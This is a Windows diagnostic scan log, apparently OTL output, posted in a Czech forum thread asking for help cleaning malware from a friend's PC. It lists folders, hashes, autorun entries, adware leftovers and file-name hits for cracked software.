[2014.06.25 18:19:09 | 000,000,000 | ---D | M] -- C:\Users\2014\AppData\Roaming\IObit
[2014.07.23 09:03:32 | 000,000,000 | ---D | M] -- C:\Users\2014\AppData\Roaming\Luxand
[2014.07.23 09:03:15 | 000,000,000 | ---D | M] -- C:\Users\2014\AppData\Roaming\OpenCandy
[2014.03.26 00:39:28 | 000,000,000 | ---D | M] -- C:\Users\2014\AppData\Roaming\OpenOffice
[2014.03.26 00:28:22 | 000,000,000 | ---D | M] -- C:\Users\2014\AppData\Roaming\Oracle
[2014.07.08 17:54:17 | 000,000,000 | ---D | M] -- C:\Users\2014\AppData\Roaming\PowerISO
[2014.07.13 08:44:38 | 000,000,000 | ---D | M] -- C:\Users\2014\AppData\Roaming\QuickScan
[2014.07.23 09:50:49 | 000,000,000 | ---D | M] -- C:\Users\2014\AppData\Roaming\Seznam.cz
[2014.06.15 08:23:13 | 000,000,000 | ---D | M] -- C:\Users\2014\AppData\Roaming\TeamViewer
[2014.07.13 20:54:19 | 000,000,000 | ---D | M] -- C:\Users\2014\AppData\Roaming\Template
[2014.07.22 15:14:39 | 000,000,000 | ---D | M] -- C:\Users\2014\AppData\Roaming\update_tc
[2014.07.23 10:48:16 | 000,000,000 | ---D | M] -- C:\Users\2014\AppData\Roaming\uTorrent
[2014.07.19 09:18:18 | 000,000,000 | ---D | M] -- C:\Users\2014\AppData\Roaming\webssearches
[2014.06.11 16:22:36 | 000,000,000 | ---D | M] -- C:\Users\Fanda Kuba\AppData\Roaming\Seznam.cz

========== Purity Check ==========



========== Custom Scans ==========

< >
[2009.07.14 07:08:49 | 000,000,006 | -H-- | C] () -- C:\Windows\Tasks\SA.DAT
[2009.07.14 07:08:49 | 000,028,016 | ---- | C] () -- C:\Windows\Tasks\SCHEDLGU.TXT
[2014.03.26 00:29:55 | 000,000,914 | ---- | C] () -- C:\Windows\Tasks\Adobe Flash Player Updater.job
[2014.07.08 17:58:06 | 000,000,364 | ---- | C] () -- C:\Windows\Tasks\AmiUpdXp.job

< >

< MD5 for: ATAPI.SYS >
[2009.07.14 03:52:21 | 000,024,128 | ---- | M] (Microsoft Corporation) MD5=02062C0B390B7729EDC9E69C680A6F3C -- C:\Windows\SysNative\drivers\atapi.sys
[2009.07.14 03:52:21 | 000,024,128 | ---- | M] (Microsoft Corporation) MD5=02062C0B390B7729EDC9E69C680A6F3C -- C:\Windows\SysNative\DriverStore\FileRepository\mshdc.inf_amd64_neutral_552ea5111ec825a6\atapi.sys
[2009.07.14 03:52:21 | 000,024,128 | ---- | M] (Microsoft Corporation) MD5=02062C0B390B7729EDC9E69C680A6F3C -- C:\Windows\SysNative\DriverStore\FileRepository\mshdc.inf_amd64_neutral_aad30bdeec04ea5e\atapi.sys
[2009.07.14 03:52:21 | 000,024,128 | ---- | M] (Microsoft Corporation) MD5=02062C0B390B7729EDC9E69C680A6F3C -- C:\Windows\winsxs\amd64_mshdc.inf_31bf3856ad364e35_6.1.7601.17514_none_3b5e2d89382958dd\atapi.sys
[2009.07.14 03:52:21 | 000,024,128 | ---- | M] (Microsoft Corporation) MD5=02062C0B390B7729EDC9E69C680A6F3C -- C:\Windows\winsxs\amd64_mshdc.inf_31bf3856ad364e35_6.1.7601.18231_none_3b457059383c66e6\atapi.sys
[2009.07.14 03:52:21 | 000,024,128 | ---- | M] (Microsoft Corporation) MD5=02062C0B390B7729EDC9E69C680A6F3C -- C:\Windows\winsxs\amd64_mshdc.inf_31bf3856ad364e35_6.1.7601.22414_none_3be7afc0514717fa\atapi.sys

< MD5 for: AUTOCHK.EXE >
[2010.11.21 05:24:27 | 000,777,728 | ---- | M] (Microsoft Corporation) MD5=3B536A8BEC3B4F23FFDFD78B11A2AB93 -- C:\Windows\SysNative\autochk.exe
[2010.11.21 05:24:27 | 000,777,728 | ---- | M] (Microsoft Corporation) MD5=3B536A8BEC3B4F23FFDFD78B11A2AB93 -- C:\Windows\winsxs\amd64_microsoft-windows-autochk_31bf3856ad364e35_6.1.7601.17514_none_4019f2b8d860ad30\autochk.exe
[2010.11.21 05:23:53 | 000,668,160 | ---- | M] (Microsoft Corporation) MD5=F88A52EB62019D6A62FDD9E08034DBD8 -- C:\Windows\SysWOW64\autochk.exe
[2010.11.21 05:23:53 | 000,668,160 | ---- | M] (Microsoft Corporation) MD5=F88A52EB62019D6A62FDD9E08034DBD8 -- C:\Windows\winsxs\x86_microsoft-windows-autochk_31bf3856ad364e35_6.1.7601.17514_none_e3fb573520033bfa\autochk.exe

< MD5 for: CDROM.SYS >
[2010.11.21 05:23:47 | 000,147,456 | ---- | M] (Microsoft Corporation) MD5=F036CE71586E93D94DAB220D7BDF4416 -- C:\Windows\SysNative\drivers\cdrom.sys
[2010.11.21 05:23:47 | 000,147,456 | ---- | M] (Microsoft Corporation) MD5=F036CE71586E93D94DAB220D7BDF4416 -- C:\Windows\SysNative\DriverStore\FileRepository\cdrom.inf_amd64_neutral_0b3d0d1942ab684b\cdrom.sys
[2010.11.21 05:23:47 | 000,147,456 | ---- | M] (Microsoft Corporation) MD5=F036CE71586E93D94DAB220D7BDF4416 -- C:\Windows\winsxs\amd64_cdrom.inf_31bf3856ad364e35_6.1.7601.17514_none_bdcf6151ba66f48b\cdrom.sys

< MD5 for: EXPLORER.EXE >
[2011.02.26 07:19:21 | 002,616,320 | ---- | M] (Microsoft Corporation) MD5=0FB9C74046656D1579A64660AD67B746 -- C:\Windows\winsxs\wow64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7601.21669_none_ba87e574ddfe652d\explorer.exe
[2011.02.25 08:19:32 | 002,871,808 | ---- | M] (Microsoft Corporation) MD5=332FEAB1435662FC6C672E25BEB37BE3 -- C:\Windows\explorer.exe
[2011.02.25 08:19:30 | 002,871,808 | ---- | M] (Microsoft Corporation) MD5=332FEAB1435662FC6C672E25BEB37BE3 -- C:\Windows\W7SOC\explorer.exe
[2011.02.25 08:19:30 | 002,871,808 | ---- | M] (Microsoft Corporation) MD5=332FEAB1435662FC6C672E25BEB37BE3 -- C:\Windows\winsxs\amd64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7601.17567_none_afa79dc39081d0ba\explorer.exe
[2011.02.26 08:14:34 | 002,871,808 | ---- | M] (Microsoft Corporation) MD5=3B69712041F3D63605529BD66DC00C48 -- C:\Windows\winsxs\amd64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7601.21669_none_b0333b22a99da332\explorer.exe
[2010.11.21 05:24:25 | 002,616,320 | ---- | M] (Microsoft Corporation) MD5=40D777B7A95E00593EB1568C68514493 -- C:\Windows\winsxs\wow64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7601.17514_none_ba2f56d3c4bcbafb\explorer.exe
[2011.02.25 07:30:54 | 002,616,320 | ---- | M] (Microsoft Corporation) MD5=8B88EBBB05A0E56B7DCC708498C02B3E -- C:\Windows\SysWOW64\explorer.exe
[2011.02.25 07:30:54 | 002,616,320 | ---- | M] (Microsoft Corporation) MD5=8B88EBBB05A0E56B7DCC708498C02B3E -- C:\Windows\winsxs\wow64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7601.17567_none_b9fc4815c4e292b5\explorer.exe
[2010.11.21 05:24:11 | 002,872,320 | ---- | M] (Microsoft Corporation) MD5=AC4C51EB24AA95B77F705AB159189E24 -- C:\Windows\winsxs\amd64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7601.17514_none_afdaac81905bf900\explorer.exe

< MD5 for: HAL.DLL >
[2010.11.21 05:24:08 | 000,263,040 | ---- | M] (Microsoft Corporation) MD5=CFB8C673F9188F99466E76C6972191E0 -- C:\Windows\SysNative\hal.dll
[2010.11.21 05:24:08 | 000,263,040 | ---- | M] (Microsoft Corporation) MD5=CFB8C673F9188F99466E76C6972191E0 -- C:\Windows\winsxs\amd64_microsoft-windows-hal_31bf3856ad364e35_6.1.7601.17514_none_094ef8137049c196\hal.dll

< MD5 for: SCECLI.DLL >
[2010.11.21 05:23:54 | 000,175,616 | ---- | M] (Microsoft Corporation) MD5=8124944EC89D6A1815E4E53F5B96AAF4 -- C:\Windows\SysWOW64\scecli.dll
[2010.11.21 05:23:54 | 000,175,616 | ---- | M] (Microsoft Corporation) MD5=8124944EC89D6A1815E4E53F5B96AAF4 -- C:\Windows\winsxs\wow64_microsoft-windows-s..urationengineclient_31bf3856ad364e35_6.1.7601.17514_none_a088921d241bbb4e\scecli.dll
[2010.11.21 05:24:32 | 000,232,960 | ---- | M] (Microsoft Corporation) MD5=ED78427259134C63ED69804D2132B86C -- C:\Windows\SysNative\scecli.dll
[2010.11.21 05:24:32 | 000,232,960 | ---- | M] (Microsoft Corporation) MD5=ED78427259134C63ED69804D2132B86C -- C:\Windows\winsxs\amd64_microsoft-windows-s..urationengineclient_31bf3856ad364e35_6.1.7601.17514_none_9633e7caefbaf953\scecli.dll

< MD5 for: SERVICES.EXE >
[2009.07.14 03:39:37 | 000,328,704 | ---- | M] (Microsoft Corporation) MD5=24ACB7E5BE595468E3B9AA488B9B4FCB -- C:\Windows\SysNative\services.exe
[2009.07.14 03:39:37 | 000,328,704 | ---- | M] (Microsoft Corporation) MD5=24ACB7E5BE595468E3B9AA488B9B4FCB -- C:\Windows\winsxs\amd64_microsoft-windows-s..s-servicecontroller_31bf3856ad364e35_6.1.7600.16385_none_2b54b20ee6fa07b1\services.exe

< MD5 for: SVCHOST.EXE >
[2009.07.14 03:14:41 | 000,020,992 | ---- | M] (Microsoft Corporation) MD5=54A47F6B5E09A77E61649109C6A08866 -- C:\Windows\SysWOW64\svchost.exe
[2009.07.14 03:14:41 | 000,020,992 | ---- | M] (Microsoft Corporation) MD5=54A47F6B5E09A77E61649109C6A08866 -- C:\Windows\winsxs\x86_microsoft-windows-services-svchost_31bf3856ad364e35_6.1.7600.16385_none_b591afc466a15356\svchost.exe
[2009.07.14 03:39:46 | 000,027,136 | ---- | M] (Microsoft Corporation) MD5=C78655BC80301D76ED4FEF1C1EA40A7D -- C:\Windows\SysNative\svchost.exe
[2009.07.14 03:39:46 | 000,027,136 | ---- | M] (Microsoft Corporation) MD5=C78655BC80301D76ED4FEF1C1EA40A7D -- C:\Windows\winsxs\amd64_microsoft-windows-services-svchost_31bf3856ad364e35_6.1.7600.16385_none_11b04b481efec48c\svchost.exe

< MD5 for: TCPIP.SYS >
[2012.10.03 19:56:54 | 001,914,248 | ---- | M] (Microsoft Corporation) MD5=37608401DFDB388CAF66917F6B2D6FB0 -- C:\Windows\winsxs\amd64_microsoft-windows-tcpip-binaries_31bf3856ad364e35_6.1.7601.17964_none_110e0fbd7d2e4b88\tcpip.sys
[2013.09.08 04:30:37 | 001,903,552 | ---- | M] (Microsoft Corporation) MD5=40AF23633D197905F03AB5628C558C51 -- C:\Windows\SysNative\drivers\tcpip.sys
[2013.09.08 04:30:37 | 001,903,552 | ---- | M] (Microsoft Corporation) MD5=40AF23633D197905F03AB5628C558C51 -- C:\Windows\winsxs\amd64_microsoft-windows-tcpip-binaries_31bf3856ad364e35_6.1.7601.18254_none_1118bb977d265d27\tcpip.sys
[2010.11.21 05:24:08 | 001,924,480 | ---- | M] (Microsoft Corporation) MD5=509383E505C973ED7534A06B3D19688D -- C:\Windows\winsxs\amd64_microsoft-windows-tcpip-binaries_31bf3856ad364e35_6.1.7601.17514_none_114417c17d05cb37\tcpip.sys
[2013.09.07 04:27:48 | 001,896,896 | ---- | M] (Microsoft Corporation) MD5=75F9106B74585D38C8FF6BB5CAD262D7 -- C:\Windows\winsxs\amd64_microsoft-windows-tcpip-binaries_31bf3856ad364e35_6.1.7601.22444_none_11ad2a34963bde27\tcpip.sys
[2013.07.06 07:20:38 | 001,900,992 | ---- | M] (Microsoft Corporation) MD5=B27F13153343BC37A27EAE01634D94E1 -- C:\Windows\winsxs\amd64_microsoft-windows-tcpip-binaries_31bf3856ad364e35_6.1.7601.22378_none_1190b9b296509a2f\tcpip.sys
[2012.10.03 19:44:29 | 001,902,472 | ---- | M] (Microsoft Corporation) MD5=D5707FC2300AA5B04B7BFE86D40C0133 -- C:\Windows\winsxs\amd64_microsoft-windows-tcpip-binaries_31bf3856ad364e35_6.1.7601.22124_none_11c2c45a962baed0\tcpip.sys
[2013.07.06 08:03:53 | 001,910,208 | ---- | M] (Microsoft Corporation) MD5=DB74544B75566C974815E79A62433F29 -- C:\Windows\winsxs\amd64_microsoft-windows-tcpip-binaries_31bf3856ad364e35_6.1.7601.18203_none_114dcae97cfeb81b\tcpip.sys
[2013.11.26 13:34:34 | 001,897,408 | ---- | M] (Microsoft Corporation) MD5=F55B41AA6114568AC558ADBABDA85620 -- C:\Windows\winsxs\amd64_microsoft-windows-tcpip-binaries_31bf3856ad364e35_6.1.7601.22525_none_11c3cc3c962abcc3\tcpip.sys

< MD5 for: USERINIT.EXE >
[2010.11.21 05:23:55 | 000,026,624 | ---- | M] (Microsoft Corporation) MD5=61AC3EFDFACFDD3F0F11DD4FD4044223 -- C:\Windows\SysWOW64\userinit.exe
[2010.11.21 05:23:55 | 000,026,624 | ---- | M] (Microsoft Corporation) MD5=61AC3EFDFACFDD3F0F11DD4FD4044223 -- C:\Windows\winsxs\x86_microsoft-windows-userinit_31bf3856ad364e35_6.1.7601.17514_none_de3024012ff21116\userinit.exe
[2010.11.21 05:24:28 | 000,030,720 | ---- | M] (Microsoft Corporation) MD5=BAFE84E637BF7388C96EF48D4D3FDD53 -- C:\Windows\SysNative\userinit.exe
[2010.11.21 05:24:28 | 000,030,720 | ---- | M] (Microsoft Corporation) MD5=BAFE84E637BF7388C96EF48D4D3FDD53 -- C:\Windows\winsxs\amd64_microsoft-windows-userinit_31bf3856ad364e35_6.1.7601.17514_none_3a4ebf84e84f824c\userinit.exe

< MD5 for: WINLOGON.EXE >
[2010.11.21 05:24:29 | 000,390,656 | ---- | M] (Microsoft Corporation) MD5=1151B1BAA6F350B1DB6598E0FEA7C457 -- C:\Windows\winsxs\amd64_microsoft-windows-winlogon_31bf3856ad364e35_6.1.7601.17514_none_cde90685eb910636\winlogon.exe
[2014.03.04 13:08:14 | 000,455,680 | ---- | M] (Microsoft Corporation) MD5=6CE2AE073BD21C542FC2C707CAE944CC -- C:\Windows\winsxs\amd64_microsoft-windows-winlogon_31bf3856ad364e35_6.1.7601.22616_none_ce748d1d04acf24f\winlogon.exe
[2014.03.04 11:43:50 | 000,455,168 | ---- | M] (Microsoft Corporation) MD5=88AB9B72B4BF3963A0DE0820B4B0B06C -- C:\Windows\SysNative\winlogon.exe
[2014.03.04 11:43:50 | 000,455,168 | ---- | M] (Microsoft Corporation) MD5=88AB9B72B4BF3963A0DE0820B4B0B06C -- C:\Windows\winsxs\amd64_microsoft-windows-winlogon_31bf3856ad364e35_6.1.7601.18409_none_cdf8bf35eb848572\winlogon.exe

< >

< %systemroot%*.* /U /s >
[1 C:\Windows\*.tmp files -> C:\Windows\*.tmp -> ]
[1 C:\Windows\assembly\NativeImages_v2.0.50727_32\Temp\*.tmp files -> C:\Windows\assembly\NativeImages_v2.0.50727_32\Temp\*.tmp -> ]
[9 C:\Windows\assembly\NativeImages_v2.0.50727_64\Temp\*.tmp files -> C:\Windows\assembly\NativeImages_v2.0.50727_64\Temp\*.tmp -> ]
[1 C:\Windows\Installer\*.tmp files -> C:\Windows\Installer\*.tmp -> ]
[1 C:\Windows\SoftwareDistribution\Download\ebb8b24a866efb8ccf046ff6b9882fa1\*.tmp files -> C:\Windows\SoftwareDistribution\Download\ebb8b24a866efb8ccf046ff6b9882fa1\*.tmp -> ]
[1 C:\Windows\System32\spp\tokens\pkeyconfig\*.tmp files -> C:\Windows\System32\spp\tokens\pkeyconfig\*.tmp -> ]
[1 C:\Windows\SysWOW64\spp\tokens\pkeyconfig\*.tmp files -> C:\Windows\SysWOW64\spp\tokens\pkeyconfig\*.tmp -> ]
[1 C:\Windows\Temp\*.tmp files -> C:\Windows\Temp\*.tmp -> ]

< %SYSTEMDRIVE%\*.exe >

< %ALLUSERSPROFILE%\Application Data\*. >

< %ALLUSERSPROFILE%\Application Data\*.exe /s >

< %APPDATA%\*. >
[2014.03.26 00:39:10 | 000,000,000 | ---D | M] -- C:\Users\2014\AppData\Roaming\Adobe
[2014.07.01 19:51:53 | 000,000,000 | ---D | M] -- C:\Users\2014\AppData\Roaming\Apple Computer
[2014.03.25 12:19:40 | 000,000,000 | ---D | M] -- C:\Users\2014\AppData\Roaming\ATI
[2014.07.01 20:09:34 | 000,000,000 | ---D | M] -- C:\Users\2014\AppData\Roaming\AVG
[2014.07.17 17:00:13 | 000,000,000 | ---D | M] -- C:\Users\2014\AppData\Roaming\FirefoxToolbar
[2014.03.26 00:01:08 | 000,000,000 | ---D | M] -- C:\Users\2014\AppData\Roaming\GHISLER
[2014.03.25 12:10:36 | 000,000,000 | ---D | M] -- C:\Users\2014\AppData\Roaming\Identities
[2014.07.13 09:36:09 | 000,000,000 | ---D | M] -- C:\Users\2014\AppData\Roaming\ImperiaOnline
[2014.03.25 12:21:52 | 000,000,000 | ---D | M] -- C:\Users\2014\AppData\Roaming\InstallShield
[2014.06.25 18:19:09 | 000,000,000 | ---D | M] -- C:\Users\2014\AppData\Roaming\IObit
[2014.07.23 09:03:32 | 000,000,000 | ---D | M] -- C:\Users\2014\AppData\Roaming\Luxand
[2014.03.26 00:31:28 | 000,000,000 | ---D | M] -- C:\Users\2014\AppData\Roaming\Macromedia
[2011.04.12 10:45:23 | 000,000,000 | ---D | M] -- C:\Users\2014\AppData\Roaming\Media Center Programs
[2014.07.11 12:31:49 | 000,000,000 | ---D | M] -- C:\Users\2014\AppData\Roaming\Media Player Classic
[2014.07.23 16:29:17 | 000,000,000 | --SD | M] -- C:\Users\2014\AppData\Roaming\Microsoft
[2014.03.26 00:40:59 | 000,000,000 | ---D | M] -- C:\Users\2014\AppData\Roaming\Mozilla
[2014.07.23 09:03:15 | 000,000,000 | ---D | M] -- C:\Users\2014\AppData\Roaming\OpenCandy
[2014.03.26 00:39:28 | 000,000,000 | ---D | M] -- C:\Users\2014\AppData\Roaming\OpenOffice
[2014.03.26 00:28:22 | 000,000,000 | ---D | M] -- C:\Users\2014\AppData\Roaming\Oracle
[2014.07.08 17:54:17 | 000,000,000 | ---D | M] -- C:\Users\2014\AppData\Roaming\PowerISO
[2014.07.13 08:44:38 | 000,000,000 | ---D | M] -- C:\Users\2014\AppData\Roaming\QuickScan
[2014.07.23 09:50:49 | 000,000,000 | ---D | M] -- C:\Users\2014\AppData\Roaming\Seznam.cz
[2014.07.21 22:27:31 | 000,000,000 | ---D | M] -- C:\Users\2014\AppData\Roaming\Skype
[2014.06.15 08:23:13 | 000,000,000 | ---D | M] -- C:\Users\2014\AppData\Roaming\TeamViewer
[2014.07.13 20:54:19 | 000,000,000 | ---D | M] -- C:\Users\2014\AppData\Roaming\Template
[2014.07.22 15:14:39 | 000,000,000 | ---D | M] -- C:\Users\2014\AppData\Roaming\update_tc
[2014.07.23 10:55:51 | 000,000,000 | ---D | M] -- C:\Users\2014\AppData\Roaming\uTorrent
[2014.07.19 09:18:18 | 000,000,000 | ---D | M] -- C:\Users\2014\AppData\Roaming\webssearches
[2014.03.26 00:22:06 | 000,000,000 | ---D | M] -- C:\Users\2014\AppData\Roaming\WinRAR
Nahoru
neumimvymysletjmeno
2. Stupeň Varování
Příspěvky: 91
Registrován: 23 čer 2014 12:59

Re: Kámošův pc - havěť

#7 Příspěvek od neumimvymysletjmeno »

< %APPDATA%\*.exe /s >
[2014.07.23 09:04:20 | 027,826,600 | ---- | M] (AVG) -- C:\Users\2014\AppData\Roaming\OpenCandy\0F96CD93CDA24759AA4A421B0B5C6605\AVG-PC-TuneUp2014-cz-CZ-p4v1.exe
[2014.04.10 00:33:06 | 027,826,600 | ---- | M] (AVG) -- C:\Users\2014\AppData\Roaming\OpenCandy\7B9B3157DAAC44C4913B3CAE863F27D6\AVG-PC-TuneUp2014.exe
[2014.07.23 09:03:13 | 000,302,888 | ---- | M] (OpenCandy) -- C:\Users\2014\AppData\Roaming\OpenCandy\OpenCandy_0F96CD93CDA24759AA4A421B0B5C6605\dlm.exe
[2013.05.16 15:25:04 | 001,062,472 | ---- | M] () -- C:\Users\2014\AppData\Roaming\Seznam.cz\szninstall.exe
[2013.05.16 15:26:24 | 002,589,256 | ---- | M] () -- C:\Users\2014\AppData\Roaming\Seznam.cz\sznsetup.exe
[2013.04.16 13:52:34 | 000,055,808 | ---- | M] () -- C:\Users\2014\AppData\Roaming\Seznam.cz\bin\ffkill.exe
[2013.04.29 12:53:34 | 000,045,560 | ---- | M] () -- C:\Users\2014\AppData\Roaming\Seznam.cz\bin\listicka-x64.exe
[2013.04.12 10:13:24 | 000,457,208 | ---- | M] () -- C:\Users\2014\AppData\Roaming\Seznam.cz\bin\szndesktop.exe
[2013.04.12 10:10:22 | 000,092,664 | ---- | M] () -- C:\Users\2014\AppData\Roaming\Seznam.cz\bin\wszndesktop.exe
[2014.07.13 08:43:41 | 001,331,792 | ---- | M] (BitTorrent Inc.) -- C:\Users\2014\AppData\Roaming\uTorrent\uTorrent.exe
[2014.07.13 08:43:41 | 001,331,792 | ---- | M] (BitTorrent Inc.) -- C:\Users\2014\AppData\Roaming\uTorrent\updates\3.4.2_32343.exe
[2014.06.30 02:50:10 | 001,862,296 | ---- | M] (Skytech Co., Ltd.) -- C:\Users\2014\AppData\Roaming\webssearches\UninstallManager.exe

< %systemroot%\*. /mp /s >

< %systemroot%\system32\*.dll /lockedfiles >

< %systemroot%\Tasks\*.job >
[2014.07.23 10:14:00 | 000,000,914 | ---- | M] () -- C:\Windows\Tasks\Adobe Flash Player Updater.job
[2014.07.23 09:45:50 | 000,000,364 | ---- | M] () -- C:\Windows\Tasks\AmiUpdXp.job

< %systemroot%\system32\drivers\*.sys /lockedfiles >

< %systemroot%\System32\config\*.sav >

< %systemroot%\system32\*.dll /lockedfiles >

< %systemroot%\system32\drivers\*.sys /3 >

< %systemroot%\system32\*.* /3 >

< %SYSTEMDRIVE%\*.exe >

< >

< HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /s >
"RocketDock" = "C:\Program Files (x86)\RocketDock\RocketDock.exe" -- [2007.09.02 14:58:52 | 000,495,616 | ---- | M] ()
"cz.seznam.software.autoupdate" = "C:\Users\2014\AppData\Roaming\Seznam.cz\szninstall.exe" -c -- [2013.05.16 15:25:04 | 001,062,472 | ---- | M] ()
"cz.seznam.software.szndesktop" = "C:\Users\2014\AppData\Roaming\Seznam.cz\bin\wszndesktop.exe" -q -- [2013.04.12 10:10:22 | 000,092,664 | ---- | M] ()
"Sidebar" = C:\Program Files\Windows Sidebar\sidebar.exe /autoRun -- [2010.11.21 05:24:51 | 001,475,584 | ---- | M] (Microsoft Corporation)
"Newgen" = C:\Program Files (x86)\UX Pack\Newgen\Newgen.exe -winstart
"iLivid" = "C:\Users\2014\AppData\Local\iLivid\iLivid.exe" -autorun -- [2014.05.25 11:23:21 | 007,913,472 | ---- | M] (Bandoo Media Inc.)
"uTorrent" = "C:\Users\2014\AppData\Roaming\uTorrent\uTorrent.exe" /MINIMIZED -- [2014.07.13 08:43:41 | 001,331,792 | ---- | M] (BitTorrent Inc.)

< >

< %PROGRAMFILES%\Mozilla Firefox\firefox.exe /md5 >
[2014.03.15 10:40:20 | 000,275,568 | ---- | M] (Mozilla Corporation) MD5=8E556A72D54F7E3B7844AB9217F02DD7 -- C:\Program Files (x86)\Mozilla Firefox\firefox.exe

< %PROGRAMFILES%\Internet Explorer\iexplore.exe /md5 >
[2014.06.02 06:43:13 | 000,812,248 | ---- | M] (Microsoft Corporation) MD5=60F88F6CA6303E8273AF7AAA9AAFECAC -- C:\Program Files (x86)\Internet Explorer\iexplore.exe

< %PROGRAMFILES%\Opera\opera.exe /md5 >

< %PROGRAMFILES%\Google\Chrome\Application\chrome.exe /md5 >

< >

< %SystemDrive%\PhysicalMBR.bin /md5 >
[2014.07.23 10:45:13 | 000,000,512 | ---- | M] () MD5=7B16E4008294FA0EEB6B508C9FA9CDEA -- C:\PhysicalMBR.bin
[5 C:\*.tmp files -> C:\*.tmp -> ]

< >

< *crack* /s >
[2014.04.08 11:39:10 | 048,289,626 | ---- | M] () -- \Program Files (x86)\Adobe Photoshop CS6 full version CZ crack\Adobe Photoshop CS6 full version CZ crack.exe
[2009.12.19 13:45:08 | 000,003,460 | ---- | M] () -- \Program Files (x86)\Game_Maker8\Sprites\Maze - Platform\wall_block_cracked1.png
[2009.12.19 13:45:08 | 000,003,675 | ---- | M] () -- \Program Files (x86)\Game_Maker8\Sprites\Maze - Platform\wall_block_cracked2.png
[2009.12.19 13:45:08 | 000,004,107 | ---- | M] () -- \Program Files (x86)\Game_Maker8\Sprites\Maze - Platform\wall_block_cracked3.png
[2009.12.19 13:45:08 | 000,003,529 | ---- | M] () -- \Program Files (x86)\Game_Maker8\Sprites\Maze - Platform\wall_block_cracked4.png
[2013.09.01 18:51:32 | 037,848,944 | ---- | M] () -- \Program Files (x86)\windows 7 (aktivace legalizace crack nvod windows toolikt - HTML)\windows 7 (aktivace legalizace crack nvod windows toolikt - HTML).zip
[2014.06.20 15:48:44 | 000,001,445 | ---- | M] () -- \ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Photoshop CS6 full version CZ crack\Adobe Photoshop CS6 full version CZ crack.lnk
[2014.03.25 18:44:39 | 000,001,709 | ---- | M] () -- \ProgramData\Microsoft\Windows\Start Menu\Programs\windows 7 (aktivace legalizace crack nvod windows toolikt - HTML)\windows 7 (aktivace legalizace crack nvod windows toolikt - HTML).lnk
[2003.12.05 12:52:40 | 000,000,796 | ---- | M] () -- \Users\2014\Desktop\GTA-San-Andreas\GTA San Andreas\data\Decision\Craig\crack1.ped
[2014.06.20 15:48:44 | 000,001,445 | ---- | M] () -- \Users\All Users\Microsoft\Windows\Start Menu\Programs\Adobe Photoshop CS6 full version CZ crack\Adobe Photoshop CS6 full version CZ crack.lnk
[2014.03.25 18:44:39 | 000,001,709 | ---- | M] () -- \Users\All Users\Microsoft\Windows\Start Menu\Programs\windows 7 (aktivace legalizace crack nvod windows toolikt - HTML)\windows 7 (aktivace legalizace crack nvod windows toolikt - HTML).lnk

< *keygen* /s >

< *loader* /s >
[2013.03.09 08:17:04 | 000,268,440 | ---- | M] () -- \Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\VSTOLoader.dll
[2013.03.09 08:17:04 | 000,019,080 | ---- | M] () -- \Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\1033\VSTOLoaderUI.dll
[2014.02.07 11:27:14 | 000,222,208 | ---- | M] () -- \Program Files (x86)\Deskshare\IP Camera Viewer 1.0\DSDownloader.dll
[2014.02.07 11:27:14 | 000,022,592 | ---- | M] () -- \Program Files (x86)\Deskshare\IP Camera Viewer 1.0\DSProductDownloader.exe
[2009.12.17 01:07:42 | 000,000,123 | ---- | M] () -- \Program Files (x86)\Game_Maker8\html\Loader.htm
[2009.12.17 01:30:00 | 000,006,111 | ---- | M] () -- \Program Files (x86)\Game_Maker8\html\Loader2.htm
[2002.08.18 21:14:40 | 000,348,160 | ---- | M] () -- \Program Files (x86)\GameSpy Arcade\Services\_common\PortraitLoader.dll
[2009.05.31 03:21:00 | 000,071,008 | ---- | M] () -- \Program Files (x86)\NVIDIA Corporation\PhysX\Common\PhysXLoader.dll
[2009.05.31 03:21:00 | 000,073,568 | ---- | M] () -- \Program Files (x86)\NVIDIA Corporation\PhysX\Common\PhysXLoader64.dll
[2013.09.17 05:54:36 | 000,029,696 | ---- | M] () -- \Program Files (x86)\OpenOffice 4\program\javaloader.uno.dll
[2013.09.17 05:57:36 | 000,005,813 | ---- | M] () -- \Program Files (x86)\OpenOffice 4\program\pythonloader.py
[2013.09.17 05:54:38 | 000,020,992 | ---- | M] () -- \Program Files (x86)\OpenOffice 4\program\pythonloader.uno.dll
[2013.09.20 14:57:06 | 000,000,171 | ---- | M] () -- \Program Files (x86)\OpenOffice 4\program\pythonloader.uno.ini
[2013.09.20 14:39:02 | 000,003,868 | ---- | M] () -- \Program Files (x86)\OpenOffice 4\program\classes\unoloader.jar
[2013.09.16 23:10:56 | 000,013,420 | ---- | M] () -- \Program Files (x86)\OpenOffice 4\program\python-core-2.7.5\lib\unittest\loader.py
[2012.11.27 16:39:24 | 000,042,548 | ---- | M] () -- \Program Files (x86)\Unity\MonoDevelop\bin\gdk-pixbuf-query-loaders.exe
[2014.05.24 14:49:22 | 000,002,992 | ---- | M] () -- \Program Files (x86)\Unity\MonoDevelop\etc\gtk-2.0\gdk-pixbuf.loaders
[2006.08.21 15:11:06 | 000,086,016 | ---- | M] () -- \Program Files (x86)\YouTUBE (TM) movie downloader\YouTubeDownloader.exe
[2011.10.13 02:46:00 | 000,064,352 | ---- | M] () -- \Program Files\astragon\Bus-Simulator Demo\Bin_Basic_Win32\Bin\PhysXLoader.dll
[2011.10.13 02:46:00 | 000,066,912 | ---- | M] () -- \Program Files\astragon\Bus-Simulator Demo\Bin_High_Win64\Bin\PhysXLoader64.dll
[2013.03.09 08:52:18 | 000,364,168 | ---- | M] () -- \Program Files\Common Files\Microsoft Shared\VSTO\10.0\VSTOLoader.dll
[2013.03.09 08:52:18 | 000,019,080 | ---- | M] () -- \Program Files\Common Files\Microsoft Shared\VSTO\10.0\1033\VSTOLoaderUI.dll
[2014.07.10 15:49:36 | 000,001,127 | ---- | M] () -- \ProgramData\Microsoft\Windows\Start Menu\Programs\YouTUBE (TM) movie downloader\Uninstall YouTUBE (TM) movie downloader.lnk
[2014.07.10 15:49:35 | 000,001,147 | ---- | M] () -- \ProgramData\Microsoft\Windows\Start Menu\Programs\YouTUBE (TM) movie downloader\YouTubeDownloader.lnk
